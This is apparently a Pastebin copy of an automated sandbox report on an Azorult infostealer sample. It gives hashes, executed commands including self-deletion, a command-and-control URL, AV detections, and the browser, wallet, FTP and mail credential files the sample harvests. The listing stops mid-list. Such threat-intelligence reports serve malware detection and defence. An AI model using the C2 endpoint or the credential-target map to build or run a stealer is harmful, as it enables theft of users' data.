Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Azorult"
- * MalScore: 10.0
- * File Name: "Exes_684a838e51e48080132287983dfebb23.exe"
- * File Size: 595456
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "1ba2f3756d1fd1db8ba864a8a9d4673bc8025787b13544e95bfb15258058c911"
- * MD5: "684a838e51e48080132287983dfebb23"
- * SHA1: "cfef948721f944a932c451f27fcd605ab9d90821"
- * SHA512: "8653f8aedb567868fe0406e8be8c2d88faa6af6254e26e7906561112bf545735423de0aaeb1cee7726528a1772a4ce1f38323fb436cc3bc9a75d2157cc88e802"
- * CRC32: "5ED2D719"
- * SSDEEP: "12288:JC/SaXTq7TzWXgAmckRxVvOBc3mzyJkdFFoXBTKYzWrsxEdGC8/3:YaaG7fWXmfVvO6xJk0fxf"
- * Process Execution:
- "Exes_684a838e51e48080132287983dfebb23.exe",
- "Exes_684a838e51e48080132287983dfebb23.exe",
- "cmd.exe",
- "timeout.exe",
- "services.exe",
- "sdclt.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe",
- "svchost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_684a838e51e48080132287983dfebb23.exe\"",
- "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"Exes_684a838e51e48080132287983dfebb23.exe\"",
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\System32\\sdclt.exe /CONFIGNOTIFICATION",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\system32\\timeout.exe 3",
- "C:\\Windows\\system32\\WerFault.exe -u -p 1972 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d697f373bbbe97ee18cb841f54ca9c42c7e4438_cab_0abd4007\"",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2684 -s 260",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_20c2f8ed6e695f751745dd989c8de6fe28b2ab0_cab_062380c4\""
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Exes_684a838e51e48080132287983dfebb23.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://halloway.ru/zedd/AZO/index.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://halloway.ru/zedd/AZO/index.php"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .rsrc, entropy: 7.12, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00027000, virtual_size: 0x00026fa0"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "Exes_684a838e51e48080132287983dfebb23.exe(2736) -> Exes_684a838e51e48080132287983dfebb23.exe(3020)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 12822445 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft OneDrive"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "File has been identified by 39 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.Agent.EAWD"
- "FireEye": "Generic.mg.684a838e51e48080"
- "McAfee": "Artemis!684A838E51E4"
- "Cylance": "Unsafe"
- "AegisLab": "Trojan.Win32.Kryptik.4!c"
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- "K7GW": "Riskware ( 0040eff71 )"
- "Cybereason": "malicious.721f94"
- "Arcabit": "Trojan.Agent.EAWD"
- "TrendMicro": "TrojanSpy.Win32.LOKI.SMAD.hp"
- "Symantec": "Trojan.Gen.MBT"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "HEUR:Trojan.Win32.Kryptik.gen"
- "BitDefender": "Trojan.Agent.EAWD"
- "Avast": "Win32:Trojan-gen"
- "Endgame": "malicious (high confidence)"
- "Emsisoft": "Trojan.Agent.EAWD (B)"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.hh"
- "Trapmine": "malicious.high.ml.score"
- "SentinelOne": "DFI - Suspicious PE"
- "MaxSecure": "Trojan.Malware.300983.susgen"
- "Microsoft": "Trojan:Win32/Wacatac.B!ml"
- "ZoneAlarm": "HEUR:Trojan.Win32.Kryptik.gen"
- "GData": "Trojan.Agent.EAWD"
- "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
- "Acronis": "suspicious"
- "MAX": "malware (ai score=85)"
- "Ad-Aware": "Trojan.Agent.EAWD"
- "Malwarebytes": "Trojan.Banker"
- "ESET-NOD32": "a variant of Win32/Injector.EGTA"
- "TrendMicro-HouseCall": "TrojanSpy.Win32.LOKI.SMAD.hp"
- "Rising": "Trojan.Injector!1.AFE3 (CLASSIC)"
- "Fortinet": "W32/Injector.EGKJ!tr"
- "AVG": "Win32:Trojan-gen"
- "Panda": "Trj/GdSda.A"
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- "Qihoo-360": "HEUR/QVM05.1.B1B7.Malware.Gen"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Anomalous binary characteristics",
- "Details":
- "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)"
- "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
- * Started Service:
- "VaultSvc",
- "WerSvc",
- "W32Time"
- * Mutexes:
- "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726",
- "Local\\WERReportingForProcess1972",
- "Global\\\\xe5\\x88\\x90|",
- "Global\\\\xed\\x95\\xb06",
- "WERUI_BEX64-d697f373bbbe97ee18cb841f54ca9c42c7e4438",
- "Local\\WERReportingForProcess2684",
- "Global\\\\xe5\\x88\\x90\\xc2\\xa6",
- "Global\\\\xed\\x9e\\xa0\\xc7\\x97",
- "WERUI_APPCRASH-20c2f8ed6e695f751745dd989c8de6fe28b2ab0"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\314716712701257836252609.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\315232343332725665344219.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\315259535134278171589502.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\315259848619288749401458.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\315260623301490993566298.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\2ce1541b-c7b1-4ba0-8974-722d18a3c54d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\84d5e4ce-e6de-407e-9e5b-6ea3c5cbb73f",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAD9D.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB2ED.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB2FE.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD4F.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d697f373bbbe97ee18cb841f54ca9c42c7e4438_cab_0abd4007\\WERAD9D.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d697f373bbbe97ee18cb841f54ca9c42c7e4438_cab_0abd4007\\WERB2ED.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d697f373bbbe97ee18cb841f54ca9c42c7e4438_cab_0abd4007\\WERB2FE.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d697f373bbbe97ee18cb841f54ca9c42c7e4438_cab_0abd4007\\WERBD4F.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d697f373bbbe97ee18cb841f54ca9c42c7e4438_cab_0abd4007\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d697f373bbbe97ee18cb841f54ca9c42c7e4438_cab_0abd4007\\Report.wer.tmp",
- "C:\\Windows\\Temp\\WERA0E1.tmp.appcompat.txt",
- "C:\\Windows\\Temp\\WERA18E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\Temp\\WERA325.tmp.hdmp",
- "C:\\Windows\\Temp\\WERAAE7.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_20c2f8ed6e695f751745dd989c8de6fe28b2ab0_cab_062380c4\\WERA0E1.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_20c2f8ed6e695f751745dd989c8de6fe28b2ab0_cab_062380c4\\WERA18E.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_20c2f8ed6e695f751745dd989c8de6fe28b2ab0_cab_062380c4\\WERA325.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_20c2f8ed6e695f751745dd989c8de6fe28b2ab0_cab_062380c4\\WERAAE7.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_20c2f8ed6e695f751745dd989c8de6fe28b2ab0_cab_062380c4\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_20c2f8ed6e695f751745dd989c8de6fe28b2ab0_cab_062380c4\\Report.wer.tmp"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\314716712701257836252609.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\315232343332725665344219.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\315259535134278171589502.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\315259848619288749401458.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\315260623301490993566298.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
